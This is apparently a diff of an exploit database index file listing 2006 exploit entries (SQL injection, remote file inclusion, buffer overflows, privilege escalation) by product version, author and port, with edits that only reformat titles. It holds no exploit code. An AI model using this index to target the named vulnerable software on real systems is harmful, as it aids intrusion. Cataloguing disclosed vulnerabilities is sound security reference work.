2070,platforms/windows/remote/2070.pl,"SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit",2006-07-24,"Jacopo Cervini",windows,remote,5060 -2071,platforms/php/webapps/2071.php,"Etomite CMS <= 0.6.1 (username) SQL Injection Exploit (mq = off)",2006-07-25,rgod,php,webapps,0 +2071,platforms/php/webapps/2071.php,"Etomite CMS <= 0.6.1 - (username) SQL Injection Exploit (mq = off)",2006-07-25,rgod,php,webapps,0 2072,platforms/php/webapps/2072.php,"Etomite CMS <= 0.6.1 - (rfiles.php) Remote Command Execution Exploit",2006-07-25,rgod,php,webapps,0 -2073,platforms/multiple/dos/2073.c,"libmikmod <= 3.2.2 (GT2 loader) Local Heap Overflow PoC",2006-07-25,"Luigi Auriemma",multiple,dos,0 +2073,platforms/multiple/dos/2073.c,"libmikmod <= 3.2.2 - (GT2 loader) Local Heap Overflow PoC",2006-07-25,"Luigi Auriemma",multiple,dos,0 2074,platforms/windows/remote/2074.pm,"eIQnetworks License Manager Remote Buffer Overflow Exploit (1262)",2006-07-26,ri0t,windows,remote,10616 2075,platforms/windows/remote/2075.pm,"eIQnetworks License Manager Remote Buffer Overflow Exploit (494)",2006-07-26,ri0t,windows,remote,0 -2076,platforms/windows/remote/2076.pl,"AIM Triton 1.0.4 (SipXtapi) Remote Buffer Overflow Exploit (PoC)",2006-07-26,c0rrupt,windows,remote,5061 +2076,platforms/windows/remote/2076.pl,"AIM Triton 1.0.4 - (SipXtapi) Remote Buffer Overflow Exploit (PoC)",2006-07-26,c0rrupt,windows,remote,5061 2077,platforms/php/webapps/2077.txt,"WMNews <= 0.2a (base_datapath) Remote Inclusion",2006-07-27,uNfz,php,webapps,0 2078,platforms/php/webapps/2078.txt,"a6mambohelpdesk Mambo Component <= 18RC1 Include",2006-07-27,Dr.Jr7,php,webapps,0 2079,platforms/windows/remote/2079.pl,"eIQnetworks ESA (Syslog Server) Remote Buffer Overflow Exploit",2006-07-27,"Kevin Finisterre",windows,remote,12345 2080,platforms/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (multi) (1)",2006-07-27,"Kevin Finisterre",windows,remote,10616 -2081,platforms/php/webapps/2081.txt,"Portail PHP <= 1.7 (chemin) Remote Inclusion",2006-07-27,"Mehmet Ince",php,webapps,0 +2081,platforms/php/webapps/2081.txt,"Portail PHP <= 1.7 - (chemin) Remote Inclusion",2006-07-27,"Mehmet Ince",php,webapps,0 2082,platforms/multiple/remote/2082.html,"Mozilla Firefox <= 1.5.0.4 - Javascript Navigator Object Code Execution PoC",2006-07-28,"H D Moore",multiple,remote,0 2083,platforms/php/webapps/2083.txt,"Mambo Security Images Component <= 3.0.5 Inclusion Vulnerabilities",2006-07-28,Drago84,php,webapps,0 2084,platforms/php/webapps/2084.txt,"Mambo MGM Component <= 0.95r2 - Remote Inclusion",2006-07-28,"A-S-T TEAM",php,webapps,0 2085,platforms/php/webapps/2085.txt,"Mambo Colophon Component <= 1.2 - Remote Inclusion",2006-07-29,Drago84,php,webapps,0 2086,platforms/php/webapps/2086.txt,"Mambo mambatStaff Component <= 3.1b Remote Inclusion",2006-07-29,Dr.Jr7,php,webapps,0 2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 <= 3.6.0 b1 - (cookie) Remote Code Excution Exploit",2006-07-29,r00t,php,webapps,0 -2088,platforms/php/webapps/2088.php,"ATutor <= 1.5.3.1 (links) Remote Blind SQL Injection Exploit",2006-07-30,rgod,php,webapps,0 +2088,platforms/php/webapps/2088.php,"ATutor <= 1.5.3.1 - (links) Remote Blind SQL Injection Exploit",2006-07-30,rgod,php,webapps,0 2089,platforms/php/webapps/2089.txt,"Mambo User Home Pages Component <= 0.5 - Remote Include",2006-07-30,"Kurdish Security",php,webapps,0 2090,platforms/php/webapps/2090.txt,"Joomla com_bayesiannaivefilter Component <= 1.1 Inclusion",2006-07-30,Pablin77,php,webapps,0 2091,platforms/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 - Local Code Execution Exploit (french)",2006-07-30,NSRocket,windows,local,0 2092,platforms/php/webapps/2092.txt,"Joomla LMO Component <= 1.0b2 - Remote Include",2006-07-30,vitux,php,webapps,0 2094,platforms/windows/local/2094.c,"Open Cubic Player <= 2.6.0pre6 / 0.1.10_rc5 - Multiple BoF Exploit",2006-07-31,"Luigi Auriemma",windows,local,0 -2095,platforms/php/webapps/2095.txt,"PhpReactor 1.2.7pl1 (pathtohomedir) Remote Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 +2095,platforms/php/webapps/2095.txt,"PhpReactor 1.2.7pl1 - (pathtohomedir) Remote Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 2096,platforms/php/webapps/2096.txt,"MyNewsGroups <= 0.6b (myng_root) Remote Inclusion",2006-07-31,"Philipp Niedziela",php,webapps,0 -2097,platforms/php/webapps/2097.txt,"NewsLetter <= 3.5 (NL_PATH) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 -2098,platforms/php/webapps/2098.txt,"TSEP <= 0.942 (copyright.php) Remote Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 -2099,platforms/php/webapps/2099.txt,"WoW Roster <= 1.5.1 (subdir) Remote File Include",2006-08-01,skulmatic,php,webapps,0 -2100,platforms/php/webapps/2100.txt,"PHPAuction 2.1 (phpAds_path) Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 -2101,platforms/php/webapps/2101.txt,"newsReporter <= 1.1 (index.php) Remote Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 +2097,platforms/php/webapps/2097.txt,"NewsLetter <= 3.5 - (NL_PATH) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 +2098,platforms/php/webapps/2098.txt,"TSEP <= 0.942 - (copyright.php) Remote Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 +2099,platforms/php/webapps/2099.txt,"WoW Roster <= 1.5.1 - (subdir) Remote File Include",2006-08-01,skulmatic,php,webapps,0 +2100,platforms/php/webapps/2100.txt,"PHPAuction 2.1 - (phpAds_path) Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 +2101,platforms/php/webapps/2101.txt,"newsReporter <= 1.1 - (index.php) Remote Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 2102,platforms/php/webapps/2102.txt,"Voodoo chat <= 1.0RC1b (file_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 2103,platforms/php/webapps/2103.txt,"k_shoutbox <= 4.4 - Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 -2104,platforms/php/webapps/2104.txt,"k_fileManager <= 1.2 (dwl_include_path) Remote Inclusion",2006-08-01,SHiKaA,php,webapps,0 -2105,platforms/php/webapps/2105.php,"XMB <= 1.9.6 (u2uid) Remote SQL Injection Exploit (mq=off)",2006-08-01,rgod,php,webapps,0 +2104,platforms/php/webapps/2104.txt,"k_fileManager <= 1.2 - (dwl_include_path) Remote Inclusion",2006-08-01,SHiKaA,php,webapps,0 +2105,platforms/php/webapps/2105.php,"XMB <= 1.9.6 - (u2uid) Remote SQL Injection Exploit (mq=off)",2006-08-01,rgod,php,webapps,0 2106,platforms/osx/local/2106.pl,"Mac OS X <= 10.4.7 - fetchmail Privilege Escalation Exploit (x86)",2006-08-01,"Kevin Finisterre",osx,local,0 2107,platforms/osx/local/2107.pl,"Mac OS X <= 10.4.7 - fetchmail Privilege Escalation Exploit (ppc)",2006-08-01,"Kevin Finisterre",osx,local,0 2108,platforms/osx/local/2108.sh,"Mac OS X <= 10.4.7 - fetchmail Privilege Escalation Exploit",2006-08-01,"Kevin Finisterre",osx,local,0 -2109,platforms/php/webapps/2109.txt,"WoW Roster <= 1.70 (/lib/phpbb.php) Remote File Include",2006-08-02,|peti,php,webapps,0 -2110,platforms/php/webapps/2110.pm,"TWiki <= 4.0.4 (Configure Script) Remote Code Execution Exploit (Metasploit)",2006-08-02,"David Maciejak",php,webapps,0 -2111,platforms/osx/local/2111.pl,"Mac OS X <= 10.3.8 (CF_CHARSET_PATH) Local BoF Exploit (2)",2006-08-02,"Kevin Finisterre",osx,local,0 -2113,platforms/php/webapps/2113.txt,"SaveWeb Portal <= 3.4 (SITE_Path) Remote File Inclusion Vulnerabilities",2006-08-02,"Mehmet Ince",php,webapps,0 -2114,platforms/php/webapps/2114.htm,"TinyPHP Forum <= 3.6 (makeadmin) Remote Admin Maker Exploit",2006-08-02,SirDarckCat,php,webapps,0 -2115,platforms/php/webapps/2115.txt,"Kayako eSupport <= 2.3.1 (subd) Remote File Inclusion",2006-08-02,beford,php,webapps,0 -2116,platforms/php/webapps/2116.txt,"TSEP <= 0.942 (colorswitch.php) Remote Inclusion",2006-08-02,beford,php,webapps,0 +2109,platforms/php/webapps/2109.txt,"WoW Roster <= 1.70 - (/lib/phpbb.php) Remote File Include",2006-08-02,|peti,php,webapps,0 +2110,platforms/php/webapps/2110.pm,"TWiki <= 4.0.4 - (Configure Script) Remote Code Execution Exploit (Metasploit)",2006-08-02,"David Maciejak",php,webapps,0 +2111,platforms/osx/local/2111.pl,"Mac OS X <= 10.3.8 - (CF_CHARSET_PATH) Local BoF Exploit (2)",2006-08-02,"Kevin Finisterre",osx,local,0 +2113,platforms/php/webapps/2113.txt,"SaveWeb Portal <= 3.4 - (SITE_Path) Remote File Inclusion Vulnerabilities",2006-08-02,"Mehmet Ince",php,webapps,0 +2114,platforms/php/webapps/2114.htm,"TinyPHP Forum <= 3.6 - (makeadmin) Remote Admin Maker Exploit",2006-08-02,SirDarckCat,php,webapps,0 +2115,platforms/php/webapps/2115.txt,"Kayako eSupport <= 2.3.1 - (subd) Remote File Inclusion",2006-08-02,beford,php,webapps,0 +2116,platforms/php/webapps/2116.txt,"TSEP <= 0.942 - (colorswitch.php) Remote Inclusion",2006-08-02,beford,php,webapps,0 2117,platforms/php/webapps/2117.php,"SendCard <= 3.4.0 Unauthorized Administrative Access Exploit",2006-08-03,rgod,php,webapps,0 -2118,platforms/php/webapps/2118.php,"myBloggie <= 2.1.4 (trackback.php) Multiple SQL Injections Exploit",2006-08-07,rgod,php,webapps,0 -2119,platforms/php/webapps/2119.txt,"PHP Simple Shop <= 2.0 (abs_path) Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 -2120,platforms/php/webapps/2120.txt,"PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 -2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 (pfad) Remote File Inclusion",2006-08-07,SHiKaA,php,webapps,0 -2122,platforms/php/webapps/2122.txt,"ME Download System <= 1.3 (header.php) Remote Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 -2123,platforms/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 (tpl.inc.php) Remote Include",2006-08-07,SirDarckCat,php,webapps,0 +2118,platforms/php/webapps/2118.php,"myBloggie <= 2.1.4 - (trackback.php) Multiple SQL Injections Exploit",2006-08-07,rgod,php,webapps,0 +2119,platforms/php/webapps/2119.txt,"PHP Simple Shop <= 2.0 - (abs_path) Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 +2120,platforms/php/webapps/2120.txt,"PHP Live Helper <= 2.0 - (abs_path) Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 +2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 - (pfad) Remote File Inclusion",2006-08-07,SHiKaA,php,webapps,0 +2122,platforms/php/webapps/2122.txt,"ME Download System <= 1.3 - (header.php) Remote Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 +2123,platforms/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 - (tpl.inc.php) Remote Include",2006-08-07,SirDarckCat,php,webapps,0 2124,platforms/windows/dos/2124.php,"XChat <= 2.6.7 - (Windows) Remote Denial of Service Exploit (PHP)",2006-08-07,ratboy,windows,dos,0 2125,platforms/php/webapps/2125.txt,"Joomla JD-Wiki Component <= 1.0.2 - Remote Include",2006-08-07,jank0,php,webapps,0 -2127,platforms/php/webapps/2127.txt,"Modernbill <= 1.6 (config.php) Remote File Include",2006-08-07,Solpot,php,webapps,0 -2128,platforms/php/webapps/2128.txt,"SAPID CMS <= 1.2.3.05 (root_path) Remote File Include Vulnerabilities",2006-08-07,Kacper,php,webapps,0 -2129,platforms/php/webapps/2129.txt,"SAPID Blog <= beta 2 (root_path) Remote File Include Vulnerabilities",2006-08-07,Kacper,php,webapps,0 -2130,platforms/php/webapps/2130.txt,"SAPID Gallery <= 1.0 (root_path) Remote File Include Vulnerabilities",2006-08-07,Kacper,php,webapps,0 -2131,platforms/php/webapps/2131.txt,"SAPID Shop <= 1.2 (root_path) Remote File Include",2006-08-07,Kacper,php,webapps,0 -2132,platforms/php/webapps/2132.txt,"phpAutoMembersArea <= 3.2.5 (installed_config_file) Remote Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 +2127,platforms/php/webapps/2127.txt,"Modernbill <= 1.6 - (config.php) Remote File Include",2006-08-07,Solpot,php,webapps,0 +2128,platforms/php/webapps/2128.txt,"SAPID CMS <= 1.2.3.05 - (root_path) Remote File Include Vulnerabilities",2006-08-07,Kacper,php,webapps,0 +2129,platforms/php/webapps/2129.txt,"SAPID Blog <= beta 2 - (root_path) Remote File Include Vulnerabilities",2006-08-07,Kacper,php,webapps,0 +2130,platforms/php/webapps/2130.txt,"SAPID Gallery <= 1.0 - (root_path) Remote File Include Vulnerabilities",2006-08-07,Kacper,php,webapps,0 +2131,platforms/php/webapps/2131.txt,"SAPID Shop <= 1.2 - (root_path) Remote File Include",2006-08-07,Kacper,php,webapps,0 +2132,platforms/php/webapps/2132.txt,"phpAutoMembersArea <= 3.2.5 - (installed_config_file) Remote Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 2133,platforms/php/webapps/2133.txt,"Simple CMS Administrator Authentication Bypass",2006-08-07,daaan,php,webapps,0 2134,platforms/php/webapps/2134.txt,"phpCC 4.2 beta (base_dir) Remote File Inclusion",2006-08-07,Solpot,php,webapps,0 2135,platforms/php/webapps/2135.txt,"NEWSolved Lite 1.9.2 - (abs_path) Remote File Inclusion Vulnerabilities",2006-08-07,"Philipp Niedziela",php,webapps,0 2136,platforms/hardware/remote/2136.txt,"Barracuda Spam Firewall <= 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",hardware,remote,0 2137,platforms/php/webapps/2137.txt,"QuestCMS (main.php) Remote File Include",2006-08-07,Crackers_Child,php,webapps,0 2138,platforms/asp/webapps/2138.txt,"YenerTurk Haber Script 1.0 - Remote SQL Injection",2006-08-07,ASIANEAGLE,asp,webapps,0 -2139,platforms/php/webapps/2139.txt,"PHPCodeCabinet <= 0.5 (Core.php) Remote File Include",2006-08-07,Minion,php,webapps,0 +2139,platforms/php/webapps/2139.txt,"PHPCodeCabinet <= 0.5 - (Core.php) Remote File Include",2006-08-07,Minion,php,webapps,0 2140,platforms/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (multi) (2)",2006-08-07,ri0t,windows,remote,10616 -2141,platforms/php/webapps/2141.txt,"Visual Events Calendar 1.1 (cfg_dir) Remote Include",2006-08-07,"Mehmet Ince",php,webapps,0 +2141,platforms/php/webapps/2141.txt,"Visual Events Calendar 1.1 - (cfg_dir) Remote Include",2006-08-07,"Mehmet Ince",php,webapps,0 2142,platforms/php/webapps/2142.txt,"ZoneX 1.0.3 Publishers Gold Edition Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0 -2143,platforms/php/webapps/2143.pl,"TWiki <= 4.0.4 (configure) Remote Command Execution Exploit",2006-08-07,"Javier Olascoaga",php,webapps,0 +2143,platforms/php/webapps/2143.pl,"TWiki <= 4.0.4 - (configure) Remote Command Execution Exploit",2006-08-07,"Javier Olascoaga",php,webapps,0 2144,platforms/linux/local/2144.sh,"liblesstif <= 2-0.93.94-4mdk - (DEBUG_FILE) Local Root Exploit",2006-08-08,"Karol Wiesek",linux,local,0 2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall <= 3.3.03.053 - Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0 -2146,platforms/php/webapps/2146.txt,"docpile:we <= 0.2.2 (INIT_PATH) Remote File Inclusion Vulnerabilities",2006-08-08,"Mehmet Ince",php,webapps,0 +2146,platforms/php/webapps/2146.txt,"docpile:we <= 0.2.2 - (INIT_PATH) Remote File Inclusion Vulnerabilities",2006-08-08,"Mehmet Ince",php,webapps,0 2147,platforms/windows/dos/2147.pl,"XChat <= 2.6.7 - (Windows) Remote Denial of Service Exploit (Perl)",2006-08-08,Elo,windows,dos,0 -2148,platforms/php/webapps/2148.txt,"phNNTP <= 1.3 (article-raw.php) Remote File Include",2006-08-08,Drago84,php,webapps,0 -2149,platforms/php/webapps/2149.txt,"Hitweb <= 4.2.1 (REP_INC) Remote File Include",2006-08-08,Drago84,php,webapps,0 +2148,platforms/php/webapps/2148.txt,"phNNTP <= 1.3 - (article-raw.php) Remote File Include",2006-08-08,Drago84,php,webapps,0 +2149,platforms/php/webapps/2149.txt,"Hitweb <= 4.2.1 - (REP_INC) Remote File Include",2006-08-08,Drago84,php,webapps,0 2150,platforms/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection",2006-08-08,ASIANEAGLE,asp,webapps,0 -2151,platforms/php/webapps/2151.txt,"Cwfm <= 0.9.1 (Language) Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,0 -2152,platforms/php/webapps/2152.php,"PHP <= 4.4.3 / 5.1.4 (objIndex) Local Buffer Overflow Exploit PoC",2006-08-08,Heintz,php,webapps,0 -2153,platforms/php/webapps/2153.txt,"Boite de News <= 4.0.1 (index.php) Remote File Inclusion",2006-08-09,"the master",php,webapps,0 +2151,platforms/php/webapps/2151.txt,"Cwfm <= 0.9.1 - (Language) Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,0 +2152,platforms/php/webapps/2152.php,"PHP <= 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow Exploit PoC",2006-08-08,Heintz,php,webapps,0 +2153,platforms/php/webapps/2153.txt,"Boite de News <= 4.0.1 - (index.php) Remote File Inclusion",2006-08-09,"the master",php,webapps,0 2154,platforms/php/webapps/2154.txt,"PgMarket <= 2.2.3 - (CFG[libdir]) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,0 -2155,platforms/php/webapps/2155.txt,"See-Commerce <= 1.0.625 (owimg.php3) Remote Include",2006-08-09,Drago84,php,webapps,0 +2155,platforms/php/webapps/2155.txt,"See-Commerce <= 1.0.625 - (owimg.php3) Remote Include",2006-08-09,Drago84,php,webapps,0 2156,platforms/hardware/dos/2156.c,"PocketPC Mms Composer (WAPPush) Denial of Service Exploit",2006-08-09,"Collin Mulliner",hardware,dos,0 2157,platforms/php/webapps/2157.txt,"Tagger Luxury Edition (BBCodeFile) Remote File Include",2006-08-09,Morgan,php,webapps,0 -2158,platforms/php/webapps/2158.txt,"TinyWebGallery <= 1.5 (image) Remote Include Vulnerabilities",2006-08-09,"Mehmet Ince",php,webapps,0 -2159,platforms/php/webapps/2159.pl,"PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection Exploit",2006-08-09,simo64,php,webapps,0 +2158,platforms/php/webapps/2158.txt,"TinyWebGallery <= 1.5 - (image) Remote Include Vulnerabilities",2006-08-09,"Mehmet Ince",php,webapps,0 +2159,platforms/php/webapps/2159.pl,"PHPMyRing <= 4.2.0 - (view_com.php) Remote SQL Injection Exploit",2006-08-09,simo64,php,webapps,0 2160,platforms/windows/dos/2160.c,"OpenMPT <= 1.17.02.43 - Multiple Remote Buffer Overflow Exploit PoC",2006-08-10,"Luigi Auriemma",windows,dos,0 -2161,platforms/php/webapps/2161.pl,"SAPID CMS <= 1.2.3_rc3 (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,0 +2161,platforms/php/webapps/2161.pl,"SAPID CMS <= 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,0 2162,platforms/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-08-10,"H D Moore",windows,remote,445 -2163,platforms/php/webapps/2163.txt,"phpwcms <= 1.1-RC4 (spaw) Remote File Include",2006-08-10,Morgan,php,webapps,0 +2163,platforms/php/webapps/2163.txt,"phpwcms <= 1.1-RC4 - (spaw) Remote File Include",2006-08-10,Morgan,php,webapps,0 2164,platforms/windows/remote/2164.pm,"Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (2)",2006-08-10,"H D Moore",windows,remote,0 -2165,platforms/php/webapps/2165.txt,"Spaminator <= 1.7 (page) Remote File Include",2006-08-10,Drago84,php,webapps,0 -2166,platforms/php/webapps/2166.txt,"Thatware <= 0.4.6 (root_path) Remote File Include",2006-08-10,Drago84,php,webapps,0 -2167,platforms/php/webapps/2167.txt,"SaveWebPortal <= 3.4 (page) Remote File Inclusion",2006-08-10,Bl0od3r,php,webapps,0 +2165,platforms/php/webapps/2165.txt,"Spaminator <= 1.7 - (page) Remote File Include",2006-08-10,Drago84,php,webapps,0 +2166,platforms/php/webapps/2166.txt,"Thatware <= 0.4.6 - (root_path) Remote File Include",2006-08-10,Drago84,php,webapps,0 +2167,platforms/php/webapps/2167.txt,"SaveWebPortal <= 3.4 - (page) Remote File Inclusion",2006-08-10,Bl0od3r,php,webapps,0 2168,platforms/php/webapps/2168.txt,"phpPrintAnalyzer <= 1.2 - Remote File Include",2006-08-10,Cmaster4,php,webapps,0 -2169,platforms/php/webapps/2169.txt,"Chaussette <= 080706 (_BASE) Remote File Include Vulnerabilities",2006-08-10,Drago84,php,webapps,0 -2170,platforms/php/webapps/2170.txt,"VWar <= 1.50 R14 (online.php) Remote SQL Injection",2006-08-10,brOmstar,php,webapps,0 +2169,platforms/php/webapps/2169.txt,"Chaussette <= 080706 - (_BASE) Remote File Include Vulnerabilities",2006-08-10,Drago84,php,webapps,0 +2170,platforms/php/webapps/2170.txt,"VWar <= 1.50 R14 - (online.php) Remote SQL Injection",2006-08-10,brOmstar,php,webapps,0 2171,platforms/php/webapps/2171.txt,"WEBInsta MM 1.3e (cabsolute_path) Remote File Include",2006-08-10,"Philipp Niedziela",php,webapps,0 2172,platforms/php/webapps/2172.txt,"Mambo Remository Component <= 3.25 - Remote Include",2006-08-10,camino,php,webapps,0 2173,platforms/php/webapps/2173.txt,"MVCnPHP <= 3.0 - glConf[path_libraries] Remote Include Vulnerabilities",2006-08-10,Drago84,php,webapps,0 -2174,platforms/php/webapps/2174.txt,"Wheatblog <= 1.1 (session.php) Remote File Include",2006-08-11,O.U.T.L.A.W,php,webapps,0 -2175,platforms/php/webapps/2175.txt,"WEBinsta CMS <= 0.3.1 (templates_dir) Remote File Include Exploit",2006-08-12,K-159,php,webapps,0 +2174,platforms/php/webapps/2174.txt,"Wheatblog <= 1.1 - (session.php) Remote File Include",2006-08-11,O.U.T.L.A.W,php,webapps,0 +2175,platforms/php/webapps/2175.txt,"WEBinsta CMS <= 0.3.1 - (templates_dir) Remote File Include Exploit",2006-08-12,K-159,php,webapps,0 2176,platforms/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition Browser Denial of Service Crash",2006-08-13,Qode,hardware,dos,0 2177,platforms/php/webapps/2177.txt,"Joomla Webring Component <= 1.0 - Remote Include",2006-08-13,"Mehmet Ince",php,webapps,0 2178,platforms/php/webapps/2178.php,"XMB <= 1.9.6 Final basename() Remote Command Execution Exploit",2006-08-13,rgod,php,webapps,0 2179,platforms/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service Exploit",2006-08-13,Preddy,multiple,dos,0 2180,platforms/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service Exploit (Python)",2006-08-13,Preddy,multiple,dos,0 -2181,platforms/php/webapps/2181.pl,"phPay <= 2.02 (nu_mail.inc.php) Remote mail() Injection Exploit",2006-08-14,beford,php,webapps,0 +2181,platforms/php/webapps/2181.pl,"phPay <= 2.02 - (nu_mail.inc.php) Remote mail() Injection Exploit",2006-08-14,beford,php,webapps,0 2182,platforms/php/webapps/2182.txt,"Mambo mmp Component <= 1.2 - Remote File Include",2006-08-14,mdx,php,webapps,0 -2183,platforms/php/webapps/2183.txt,"ProjectButler <= 0.8.4 (rootdir) Remote File Include Vulnerabilities",2006-08-14,"the master",php,webapps,0 +2183,platforms/php/webapps/2183.txt,"ProjectButler <= 0.8.4 - (rootdir) Remote File Include Vulnerabilities",2006-08-14,"the master",php,webapps,0 2184,platforms/php/webapps/2184.txt,"Mambo Peoplebook Component 1.0 - Remote File Include",2006-08-14,Matdhule,php,webapps,0 -2185,platforms/linux/remote/2185.pl,"Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)",2006-08-14,K-sPecial,linux,remote,110 -2186,platforms/asp/webapps/2186.txt,"Spidey Blog Script <= 1.5 (tr) Remote SQL Injection",2006-08-14,ASIANEAGLE,asp,webapps,0 +2185,platforms/linux/remote/2185.pl,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow Exploit (3)",2006-08-14,K-sPecial,linux,remote,110 +2186,platforms/asp/webapps/2186.txt,"Spidey Blog Script <= 1.5 - (tr) Remote SQL Injection",2006-08-14,ASIANEAGLE,asp,webapps,0 2187,platforms/php/webapps/2187.htm,"WEBInsta MM <= 1.3e (absolute_path) Remote File Include Exploit",2006-08-15,str0ke,php,webapps,0 -2188,platforms/php/webapps/2188.txt,"Discloser <= 0.0.4 (fileloc) Remote File Include Vulnerabilities",2006-08-15,"Arash RJ",php,webapps,0 -2189,platforms/php/webapps/2189.txt,"WEBInsta CMS <= 0.3.1 (users.php) Remote File Include",2006-08-15,Yns,php,webapps,0 +2188,platforms/php/webapps/2188.txt,"Discloser <= 0.0.4 - (fileloc) Remote File Include Vulnerabilities",2006-08-15,"Arash RJ",php,webapps,0 +2189,platforms/php/webapps/2189.txt,"WEBInsta CMS <= 0.3.1 - (users.php) Remote File Include",2006-08-15,Yns,php,webapps,0 2190,platforms/php/webapps/2190.txt,"PHProjekt <= 5.1 - Multiple Remote File Include Vulnerabilities",2006-08-15,Kacper,php,webapps,0 -2191,platforms/php/webapps/2191.txt,"dotProject <= 2.0.4 (baseDir) Remote File Include",2006-08-16,Kacper,php,webapps,0 -2192,platforms/php/webapps/2192.txt,"OPT Max <= 1.2.0 (CRM_inc) Remote File Include",2006-08-16,Kacper,php,webapps,0 -2193,platforms/linux/local/2193.php,"PHP <= 4.4.3 / 5.1.4 (sscanf) Local Buffer Overflow Exploit",2006-08-16,Andi,linux,local,0 +2191,platforms/php/webapps/2191.txt,"dotProject <= 2.0.4 - (baseDir) Remote File Include",2006-08-16,Kacper,php,webapps,0 +2192,platforms/php/webapps/2192.txt,"OPT Max <= 1.2.0 - (CRM_inc) Remote File Include",2006-08-16,Kacper,php,webapps,0 +2193,platforms/linux/local/2193.php,"PHP <= 4.4.3 / 5.1.4 - (sscanf) Local Buffer Overflow Exploit",2006-08-16,Andi,linux,local,0 2194,platforms/windows/dos/2194.pl,"Microsoft Windows PNG File IHDR Block Denial of Service Exploit PoC",2006-08-16,Preddy,windows,dos,0 2195,platforms/windows/dos/2195.html,"VMware 5.5.1 COM Object Arbitrary Partition Table Delete Exploit",2006-08-16,nop,windows,dos,0 2196,platforms/php/webapps/2196.txt,"Mambo CopperminePhotoGalery Component Remote Include",2006-08-16,k1tk4t,php,webapps,0 -2198,platforms/php/webapps/2198.php,"CubeCart <= 3.0.11 (oid) Remote Blind SQL Injection Exploit",2006-08-17,rgod,php,webapps,0 -2199,platforms/php/webapps/2199.txt,"IRSR <= 0.2 (_sysSessionPath) Remote File Include",2006-08-17,Kacper,php,webapps,0 +2198,platforms/php/webapps/2198.php,"CubeCart <= 3.0.11 - (oid) Remote Blind SQL Injection Exploit",2006-08-17,rgod,php,webapps,0 +2199,platforms/php/webapps/2199.txt,"IRSR <= 0.2 - (_sysSessionPath) Remote File Include",2006-08-17,Kacper,php,webapps,0 2200,platforms/php/webapps/2200.txt,"WTcom <= 0.2.4-alpha (torrents.php) Remote SQL Injection",2006-08-17,sh1r081,php,webapps,0 -2201,platforms/php/webapps/2201.txt,"POWERGAP <= 2003 (s0x.php) Remote File Include",2006-08-17,"Saudi Hackrz",php,webapps,0 +2201,platforms/php/webapps/2201.txt,"POWERGAP <= 2003 - (s0x.php) Remote File Include",2006-08-17,"Saudi Hackrz",php,webapps,0 2202,platforms/php/webapps/2202.txt,"Mambo mambelfish Component <= 1.1 - Remote File Include",2006-08-17,mdx,php,webapps,0 2203,platforms/php/webapps/2203.txt,"Joomla com_jim Component <= 1.0.1 - Remote File Include",2006-08-17,"Mehmet Ince",php,webapps,0 2204,platforms/windows/dos/2204.c,"Microsoft Windows - PNG File IHDR Block Denial of Service Exploit PoC (1)",2006-08-17,Preddy,windows,dos,0 2205,platforms/php/webapps/2205.txt,"Joomla Mosets Tree <= 1.0 - Remote File Include",2006-08-17,Crackers_Child,php,webapps,0 2206,platforms/php/webapps/2206.txt,"Mambo phpShop Component <= 1.2 RC2b File Include",2006-08-17,Cmaster4,php,webapps,0 2207,platforms/php/webapps/2207.txt,"Mambo a6mambocredits Component 1.0.0 File Include",2006-08-17,Cmaster4,php,webapps,0 -2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 (IE Plugin) Remote Denial of Service Crash Exploit",2006-08-18,Mr.Niega,windows,dos,0 +2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 - (IE Plugin) Remote Denial of Service Crash Exploit",2006-08-18,Mr.Niega,windows,dos,0 